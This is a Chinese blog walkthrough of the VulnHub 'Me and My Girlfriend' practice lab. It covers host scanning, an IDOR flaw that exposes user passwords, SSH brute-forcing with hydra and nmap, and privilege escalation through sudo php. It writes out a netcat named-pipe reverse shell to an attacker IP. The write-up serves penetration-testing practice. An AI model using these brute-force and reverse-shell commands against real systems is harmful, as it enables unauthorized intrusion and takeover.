VulnHub--Me and My Girlfriend

于 2021-08-09 17:38:05 发布
阅读量962 收藏
点赞数
分类专栏: 靶机 文章标签: 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ydbxx777/article/details/119542548
版权

sudo arp-scan -l

 nmap -A -v -T4 -p- 192.168.93.158

 

 提示只有本地可以登录

 

随便注册一个用户

登录

 

profile的地址:http://192.168.93.158/index.php?page=profile&user_id=12

说明我注册用户的id是12,那么我前面有11个已注册用户,更改id值得到所有用户

 F12后

按最左上角的

 选中密码条定位

 从value看到密码

收集所有密码

 然后爆破ssh的用户密码

给出两种方法

方法1:

在kali输入:

hydra -L user1.txt -P pass1.txt ssh://192.168.93.158

方法2:

nmap -p 22 --script=ssh-brute --script-args userdb=user1.txt,passdb=pass1.txt 192.168.93.158

 均可得到用户名密码:

alice:4lic3

 ssh登录后拿到flag1

 sudo -l

sudo  /usr/bin/php -a

echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.93.128 4444 >/tmp/f");

 先nc再执行上面的

 拿到flag2

 

ydbxx777
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值